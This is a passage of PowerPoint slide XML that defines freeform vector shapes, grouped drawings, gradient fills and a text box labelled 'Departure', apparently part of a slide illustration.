                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2916" y="868"/>
                      <a:pt x="2909" y="812"/>
                      <a:pt x="2783" y="69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3" name="Freeform 1889"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="9244" y="-1485"/>
                <a:ext cx="223" cy="125"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 1 w 94"/>
                  <a:gd name="T1" fmla="*/ 22 h 53"/>
                  <a:gd name="T2" fmla="*/ 77 w 94"/>
                  <a:gd name="T3" fmla="*/ 0 h 53"/>
                  <a:gd name="T4" fmla="*/ 94 w 94"/>
                  <a:gd name="T5" fmla="*/ 17 h 53"/>
                  <a:gd name="T6" fmla="*/ 0 w 94"/>
                  <a:gd name="T7" fmla="*/ 53 h 53"/>
                  <a:gd name="T8" fmla="*/ 1 w 94"/>
                  <a:gd name="T9" fmla="*/ 22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4"/>
                  <a:gd name="T16" fmla="*/ 0 h 53"/>
                  <a:gd name="T17" fmla="*/ 94 w 94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4" h="53">
                    <a:moveTo>
                      <a:pt x="1" y="22"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="22"/>
                      <a:pt x="56" y="20"/>
                      <a:pt x="77" y="0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4" y="17"/>
                      <a:pt x="58" y="53"/>
                      <a:pt x="0" y="53"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="1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4" name="Freeform 1890"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3951" y="-1202"/>
                <a:ext cx="933" cy="548"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 76 w 395"/>
                  <a:gd name="T1" fmla="*/ 12 h 232"/>
                  <a:gd name="T2" fmla="*/ 76 w 395"/>
                  <a:gd name="T3" fmla="*/ 12 h 232"/>
                  <a:gd name="T4" fmla="*/ 22 w 395"/>
                  <a:gd name="T5" fmla="*/ 44 h 232"/>
                  <a:gd name="T6" fmla="*/ 10 w 395"/>
                  <a:gd name="T7" fmla="*/ 114 h 232"/>
                  <a:gd name="T8" fmla="*/ 10 w 395"/>
                  <a:gd name="T9" fmla="*/ 114 h 232"/>
                  <a:gd name="T10" fmla="*/ 11 w 395"/>
                  <a:gd name="T11" fmla="*/ 115 h 232"/>
                  <a:gd name="T12" fmla="*/ 15 w 395"/>
                  <a:gd name="T13" fmla="*/ 120 h 232"/>
                  <a:gd name="T14" fmla="*/ 297 w 395"/>
                  <a:gd name="T15" fmla="*/ 232 h 232"/>
                  <a:gd name="T16" fmla="*/ 395 w 395"/>
                  <a:gd name="T17" fmla="*/ 78 h 232"/>
                  <a:gd name="T18" fmla="*/ 76 w 395"/>
                  <a:gd name="T19" fmla="*/ 12 h 2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5"/>
                  <a:gd name="T31" fmla="*/ 0 h 232"/>
                  <a:gd name="T32" fmla="*/ 395 w 395"/>
                  <a:gd name="T33" fmla="*/ 232 h 23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5" h="232">
                    <a:moveTo>
                      <a:pt x="76" y="12"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="76" y="12"/>
                      <a:pt x="76" y="12"/>
                      <a:pt x="76" y="12"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="58" y="12"/>
                      <a:pt x="37" y="24"/>
                      <a:pt x="22" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="68"/>
                      <a:pt x="0" y="97"/>
                      <a:pt x="10" y="114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0" y="114"/>
                      <a:pt x="11" y="115"/>
                      <a:pt x="11" y="115"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="12" y="117"/>
                      <a:pt x="13" y="119"/>
                      <a:pt x="15" y="120"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="33" y="141"/>
                      <a:pt x="106" y="209"/>
                      <a:pt x="297" y="232"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="395" y="78"/>
                      <a:pt x="395" y="78"/>
                      <a:pt x="395" y="78"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="395" y="78"/>
                      <a:pt x="278" y="0"/>
                      <a:pt x="76" y="1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5" name="Freeform 1891"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="4549" y="-1072"/>
                <a:ext cx="396" cy="449"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 140 w 168"/>
                  <a:gd name="T1" fmla="*/ 21 h 190"/>
                  <a:gd name="T2" fmla="*/ 33 w 168"/>
                  <a:gd name="T3" fmla="*/ 57 h 190"/>
                  <a:gd name="T4" fmla="*/ 28 w 168"/>
                  <a:gd name="T5" fmla="*/ 169 h 190"/>
                  <a:gd name="T6" fmla="*/ 134 w 168"/>
                  <a:gd name="T7" fmla="*/ 134 h 190"/>
                  <a:gd name="T8" fmla="*/ 140 w 168"/>
                  <a:gd name="T9" fmla="*/ 21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8"/>
                  <a:gd name="T16" fmla="*/ 0 h 190"/>
                  <a:gd name="T17" fmla="*/ 168 w 168"/>
                  <a:gd name="T18" fmla="*/ 190 h 1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8" h="190">
                    <a:moveTo>
                      <a:pt x="140" y="21"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="112" y="0"/>
                      <a:pt x="64" y="16"/>
                      <a:pt x="33" y="57"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2" y="98"/>
                      <a:pt x="0" y="148"/>
                      <a:pt x="28" y="169"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="55" y="190"/>
                      <a:pt x="103" y="174"/>
                      <a:pt x="134" y="134"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="165" y="93"/>
                      <a:pt x="168" y="42"/>
                      <a:pt x="140" y="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6" name="Freeform 1892"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="1790" y="-1703"/>
                <a:ext cx="5475" cy="796"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 3848 w 5475"/>
                  <a:gd name="T1" fmla="*/ 0 h 796"/>
                  <a:gd name="T2" fmla="*/ 2286 w 5475"/>
                  <a:gd name="T3" fmla="*/ 319 h 796"/>
                  <a:gd name="T4" fmla="*/ 0 w 5475"/>
                  <a:gd name="T5" fmla="*/ 640 h 796"/>
                  <a:gd name="T6" fmla="*/ 543 w 5475"/>
                  <a:gd name="T7" fmla="*/ 796 h 796"/>
                  <a:gd name="T8" fmla="*/ 5475 w 5475"/>
                  <a:gd name="T9" fmla="*/ 433 h 796"/>
                  <a:gd name="T10" fmla="*/ 3848 w 5475"/>
                  <a:gd name="T11" fmla="*/ 0 h 7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75"/>
                  <a:gd name="T19" fmla="*/ 0 h 796"/>
                  <a:gd name="T20" fmla="*/ 5475 w 5475"/>
                  <a:gd name="T21" fmla="*/ 796 h 79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75" h="796">
                    <a:moveTo>
                      <a:pt x="3848" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="2286" y="319"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="640"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="543" y="796"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5475" y="433"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="384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7" name="Freeform 1893"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="1570" y="-2723"/>
                <a:ext cx="2405" cy="238"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 2405 w 2405"/>
                  <a:gd name="T1" fmla="*/ 229 h 238"/>
                  <a:gd name="T2" fmla="*/ 274 w 2405"/>
                  <a:gd name="T3" fmla="*/ 238 h 238"/>
                  <a:gd name="T4" fmla="*/ 0 w 2405"/>
                  <a:gd name="T5" fmla="*/ 156 h 238"/>
                  <a:gd name="T6" fmla="*/ 1547 w 2405"/>
                  <a:gd name="T7" fmla="*/ 0 h 238"/>
                  <a:gd name="T8" fmla="*/ 2405 w 2405"/>
                  <a:gd name="T9" fmla="*/ 229 h 2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05"/>
                  <a:gd name="T16" fmla="*/ 0 h 238"/>
                  <a:gd name="T17" fmla="*/ 2405 w 2405"/>
                  <a:gd name="T18" fmla="*/ 238 h 2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05" h="238">
                    <a:moveTo>
                      <a:pt x="2405" y="229"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="274" y="238"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="156"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1547" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2405" y="22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8" name="Freeform 1894"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="2895" y="-4084"/>
                <a:ext cx="1531" cy="1484"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 648 w 648"/>
                  <a:gd name="T1" fmla="*/ 628 h 628"/>
                  <a:gd name="T2" fmla="*/ 646 w 648"/>
                  <a:gd name="T3" fmla="*/ 620 h 628"/>
                  <a:gd name="T4" fmla="*/ 190 w 648"/>
                  <a:gd name="T5" fmla="*/ 68 h 628"/>
                  <a:gd name="T6" fmla="*/ 0 w 648"/>
                  <a:gd name="T7" fmla="*/ 0 h 628"/>
                  <a:gd name="T8" fmla="*/ 122 w 648"/>
                  <a:gd name="T9" fmla="*/ 484 h 628"/>
                  <a:gd name="T10" fmla="*/ 648 w 648"/>
                  <a:gd name="T11" fmla="*/ 628 h 6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8"/>
                  <a:gd name="T19" fmla="*/ 0 h 628"/>
                  <a:gd name="T20" fmla="*/ 648 w 648"/>
                  <a:gd name="T21" fmla="*/ 628 h 62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8" h="628">
                    <a:moveTo>
                      <a:pt x="648" y="628"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="648" y="628"/>
                      <a:pt x="648" y="622"/>
                      <a:pt x="646" y="620"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="618" y="588"/>
                      <a:pt x="285" y="214"/>
                      <a:pt x="190" y="6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2" y="484"/>
                      <a:pt x="122" y="484"/>
                      <a:pt x="122" y="484"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="648" y="62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609" name="Text Box 4811"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="7823178" y="1672138"/>
              <a:ext cx="839788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Arial" charset="0"/>
                </a:rPr>
                <a:t>Departure</a:t>
              </a:r>
              <a:endParaRPr kumimoji="0" lang="de-DE" sz="1200" b="1" i="0" u="none" strike="noStrike" kern="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grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="610" name="Group 16703"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="8846577" y="1942860"/>
              <a:ext cx="2063750" cy="968375"/>
              <a:chOff x="3262" y="1968"/>
              <a:chExt cx="1300" cy="610"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="611" name="Freeform 16346"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3262" y="2228"/>
                <a:ext cx="1300" cy="350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60" y="22"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="80" y="43"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="0" y="22"/>
                  </a:cxn>
                </a:cxnLst>
                <a:rect l="0" t="0" r="r" b="b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2B2B2">
                      <a:gamma/>
                      <a:tint val="68627"/>
                      <a:invGamma/>
                    </a:srgbClr>
                  </a:gs>
                  <a:gs pos="100000">
                    <a:srgbClr val="B2B2B2"/>
                  </a:gs>
                </a:gsLst>
                <a:lin ang="5400000" scaled="1"/>
              </a:gradFill>
              <a:ln w="190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grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="612" name="Group 16619"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="3606" y="1968"/>
                <a:ext cx="828" cy="532"/>
                <a:chOff x="2019" y="1625"/>
                <a:chExt cx="828" cy="532"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="687" name="Freeform 16620"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="2847" y="1793"/>
                  <a:ext cx="0" cy="0"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T1" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T2" fmla="*/ 0 60000 65536"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="T0">
                      <a:pos x="0" y="0"/>
                    </a:cxn>
                    <a:cxn ang="T1">
                      <a:pos x="0" y="0"/>
                    </a:cxn>
                    <a:cxn ang="T2">
                      <a:pos x="0" y="0"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="0" t="0" r="0" b="0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88" name="Freeform 16621"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="2020" y="1674"/>
                  <a:ext cx="827" cy="222"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 11194"/>
                    <a:gd name="T1" fmla="*/ 1174 h 3003"/>
                    <a:gd name="T2" fmla="*/ 4379 w 11194"/>
                    <a:gd name="T3" fmla="*/ 0 h 3003"/>
                    <a:gd name="T4" fmla="*/ 11194 w 11194"/>
                    <a:gd name="T5" fmla="*/ 1829 h 3003"/>
                    <a:gd name="T6" fmla="*/ 6812 w 11194"/>
                    <a:gd name="T7" fmla="*/ 3003 h 3003"/>
                    <a:gd name="T8" fmla="*/ 0 w 11194"/>
                    <a:gd name="T9" fmla="*/ 1174 h 300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194"/>
                    <a:gd name="T16" fmla="*/ 0 h 3003"/>
                    <a:gd name="T17" fmla="*/ 11194 w 11194"/>
                    <a:gd name="T18" fmla="*/ 3003 h 300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194" h="3003">
                      <a:moveTo>
                        <a:pt x="0" y="1174"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="4379" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="11194" y="1829"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="6812" y="3003"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="117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89" name="Freeform 16622"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="2020" y="1761"/>
                  <a:ext cx="503" cy="396"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 6812 w 6812"/>
                    <a:gd name="T1" fmla="*/ 5346 h 5346"/>
                    <a:gd name="T2" fmla="*/ 6812 w 6812"/>
                    <a:gd name="T3" fmla="*/ 1829 h 5346"/>
                    <a:gd name="T4" fmla="*/ 0 w 6812"/>
                    <a:gd name="T5" fmla="*/ 0 h 5346"/>
                    <a:gd name="T6" fmla="*/ 0 w 6812"/>
                    <a:gd name="T7" fmla="*/ 3518 h 5346"/>
                    <a:gd name="T8" fmla="*/ 6812 w 6812"/>
                    <a:gd name="T9" fmla="*/ 5346 h 534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812"/>
                    <a:gd name="T16" fmla="*/ 0 h 5346"/>
                    <a:gd name="T17" fmla="*/ 6812 w 6812"/>
                    <a:gd name="T18" fmla="*/ 5346 h 534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812" h="5346">
                      <a:moveTo>
                        <a:pt x="6812" y="5346"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="6812" y="1829"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="3518"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="6812" y="534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FFCC66"/>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:srgbClr val="FFDD99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Freeform 16623"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="2523" y="1809"/>
                  <a:ext cx="324" cy="348"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 4382 w 4382"/>
                    <a:gd name="T1" fmla="*/ 3515 h 4691"/>
                    <a:gd name="T2" fmla="*/ 4382 w 4382"/>
                    <a:gd name="T3" fmla="*/ 0 h 4691"/>
                    <a:gd name="T4" fmla="*/ 0 w 4382"/>
                    <a:gd name="T5" fmla="*/ 1174 h 4691"/>
                    <a:gd name="T6" fmla="*/ 0 w 4382"/>
                    <a:gd name="T7" fmla="*/ 4691 h 4691"/>
                    <a:gd name="T8" fmla="*/ 4382 w 4382"/>
                    <a:gd name="T9" fmla="*/ 3515 h 46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382"/>
                    <a:gd name="T16" fmla="*/ 0 h 4691"/>
                    <a:gd name="T17" fmla="*/ 4382 w 4382"/>
                    <a:gd name="T18" fmla="*/ 4691 h 469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382" h="4691">
                      <a:moveTo>
                        <a:pt x="4382" y="3515"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="4382" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="1174"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="4691"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="4382" y="351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FFCC66"/>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:srgbClr val="FFDD99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91" name="Freeform 16624"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="2538" y="1899"/>
                  <a:ext cx="295" cy="254"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 3999"/>
                    <a:gd name="T1" fmla="*/ 3425 h 3425"/>
                    <a:gd name="T2" fmla="*/ 0 w 3999"/>
                    <a:gd name="T3" fmla="*/ 1072 h 3425"/>
                    <a:gd name="T4" fmla="*/ 2098 w 3999"/>
                    <a:gd name="T5" fmla="*/ 512 h 3425"/>
                    <a:gd name="T6" fmla="*/ 3999 w 3999"/>
                    <a:gd name="T7" fmla="*/ 0 h 3425"/>
                    <a:gd name="T8" fmla="*/ 3999 w 3999"/>
                    <a:gd name="T9" fmla="*/ 2352 h 3425"/>
                    <a:gd name="T10" fmla="*/ 0 w 3999"/>
                    <a:gd name="T11" fmla="*/ 3425 h 342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999"/>
                    <a:gd name="T19" fmla="*/ 0 h 3425"/>
                    <a:gd name="T20" fmla="*/ 3999 w 3999"/>
                    <a:gd name="T21" fmla="*/ 3425 h 342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999" h="3425">
                      <a:moveTo>
                        <a:pt x="0" y="3425"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="1072"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="2098" y="512"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="3999" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="3999" y="2352"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="342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FFCC66"/>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:srgbClr val="FFDD99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92" name="Freeform 16625"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="2556" y="2082"/>
                  <a:ext cx="122" cy="66"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 1653 w 1653"/>
                    <a:gd name="T1" fmla="*/ 442 h 886"/>
                    <a:gd name="T2" fmla="*/ 0 w 1653"/>
                    <a:gd name="T3" fmla="*/ 0 h 886"/>
                    <a:gd name="T4" fmla="*/ 0 w 1653"/>
                    <a:gd name="T5" fmla="*/ 886 h 886"/>
                    <a:gd name="T6" fmla="*/ 1653 w 1653"/>
                    <a:gd name="T7" fmla="*/ 442 h 88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653"/>
                    <a:gd name="T13" fmla="*/ 0 h 886"/>
                    <a:gd name="T14" fmla="*/ 1653 w 1653"/>
                    <a:gd name="T15" fmla="*/ 886 h 88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653" h="886">
                      <a:moveTo>
                        <a:pt x="1653" y="442"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="886"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1653" y="442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93" name="Freeform 16626"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="2556" y="1957"/>
                  <a:ext cx="122" cy="158"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 1653 w 1653"/>
                    <a:gd name="T1" fmla="*/ 2133 h 2133"/>
                    <a:gd name="T2" fmla="*/ 1653 w 1653"/>
                    <a:gd name="T3" fmla="*/ 0 h 2133"/>
                    <a:gd name="T4" fmla="*/ 0 w 1653"/>
                    <a:gd name="T5" fmla="*/ 444 h 2133"/>
                    <a:gd name="T6" fmla="*/ 0 w 1653"/>
                    <a:gd name="T7" fmla="*/ 1691 h 2133"/>
                    <a:gd name="T8" fmla="*/ 1653 w 1653"/>
                    <a:gd name="T9" fmla="*/ 2133 h 2133"/>
                    <a:gd name="T10" fmla="*/ 1653 w 1653"/>
                    <a:gd name="T11" fmla="*/ 2133 h 213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653"/>
                    <a:gd name="T19" fmla="*/ 0 h 2133"/>
                    <a:gd name="T20" fmla="*/ 1653 w 1653"/>
                    <a:gd name="T21" fmla="*/ 2133 h 213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653" h="2133">
                      <a:moveTo>
                        <a:pt x="1653" y="2133"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="1653" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="444"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="1691"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1653" y="2133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FEA501"/>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:srgbClr val="FEC356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94" name="Freeform 16627"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="2698" y="1919"/>
                  <a:ext cx="122" cy="158"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 1654 w 1654"/>
                    <a:gd name="T1" fmla="*/ 2135 h 2135"/>
                    <a:gd name="T2" fmla="*/ 1654 w 1654"/>
                    <a:gd name="T3" fmla="*/ 0 h 2135"/>
                    <a:gd name="T4" fmla="*/ 0 w 1654"/>
                    <a:gd name="T5" fmla="*/ 444 h 2135"/>
                    <a:gd name="T6" fmla="*/ 0 w 1654"/>
                    <a:gd name="T7" fmla="*/ 1691 h 2135"/>
                    <a:gd name="T8" fmla="*/ 1654 w 1654"/>
                    <a:gd name="T9" fmla="*/ 2135 h 2135"/>
                    <a:gd name="T10" fmla="*/ 1654 w 1654"/>
                    <a:gd name="T11" fmla="*/ 2135 h 213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654"/>
                    <a:gd name="T19" fmla="*/ 0 h 2135"/>
                    <a:gd name="T20" fmla="*/ 1654 w 1654"/>
                    <a:gd name="T21" fmla="*/ 2135 h 213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654" h="2135">
                      <a:moveTo>
                        <a:pt x="1654" y="2135"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="1654" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="444"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="1691"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1654" y="213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FEA501"/>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:srgbClr val="FEC356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95" name="Freeform 16628"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="2698" y="2044"/>
                  <a:ext cx="122" cy="66"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 1654 w 1654"/>
                    <a:gd name="T1" fmla="*/ 444 h 886"/>
                    <a:gd name="T2" fmla="*/ 0 w 1654"/>
                    <a:gd name="T3" fmla="*/ 0 h 886"/>
                    <a:gd name="T4" fmla="*/ 0 w 1654"/>
                    <a:gd name="T5" fmla="*/ 886 h 886"/>
                    <a:gd name="T6" fmla="*/ 1654 w 1654"/>
                    <a:gd name="T7" fmla="*/ 444 h 88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654"/>
                    <a:gd name="T13" fmla="*/ 0 h 886"/>
                    <a:gd name="T14" fmla="*/ 1654 w 1654"/>
                    <a:gd name="T15" fmla="*/ 886 h 88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654" h="886">
                      <a:moveTo>
                        <a:pt x="1654" y="444"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="886"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1654" y="444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96" name="Freeform 16629"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="2019" y="1625"/>
                  <a:ext cx="759" cy="271"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 1744 w 4349"/>
                    <a:gd name="T1" fmla="*/ 106 h 1549"/>
                    <a:gd name="T2" fmla="*/ 1391 w 4349"/>
                    <a:gd name="T3" fmla="*/ 12 h 1549"/>
                    <a:gd name="T4" fmla="*/ 839 w 4349"/>
                    <a:gd name="T5" fmla="*/ 71 h 1549"/>
                    <a:gd name="T6" fmla="*/ 3 w 4349"/>
                    <a:gd name="T7" fmla="*/ 775 h 1549"/>
                    <a:gd name="T8" fmla="*/ 1035 w 4349"/>
                    <a:gd name="T9" fmla="*/ 1052 h 1549"/>
                    <a:gd name="T10" fmla="*/ 2887 w 4349"/>
                    <a:gd name="T11" fmla="*/ 1549 h 1549"/>
                    <a:gd name="T12" fmla="*/ 2887 w 4349"/>
                    <a:gd name="T13" fmla="*/ 1549 h 1549"/>
                    <a:gd name="T14" fmla="*/ 3669 w 4349"/>
                    <a:gd name="T15" fmla="*/ 836 h 1549"/>
                    <a:gd name="T16" fmla="*/ 4349 w 4349"/>
                    <a:gd name="T17" fmla="*/ 795 h 1549"/>
                    <a:gd name="T18" fmla="*/ 1744 w 4349"/>
                    <a:gd name="T19" fmla="*/ 106 h 154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49"/>
                    <a:gd name="T31" fmla="*/ 0 h 1549"/>
                    <a:gd name="T32" fmla="*/ 4349 w 4349"/>
                    <a:gd name="T33" fmla="*/ 1549 h 154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49" h="1549">
                      <a:moveTo>
                        <a:pt x="1744" y="106"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="1391" y="12"/>
                        <a:pt x="1391" y="12"/>
                        <a:pt x="1391" y="12"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1225" y="0"/>
                        <a:pt x="1035" y="18"/>
                        <a:pt x="839" y="71"/>
                      </a:cubicBezTo>
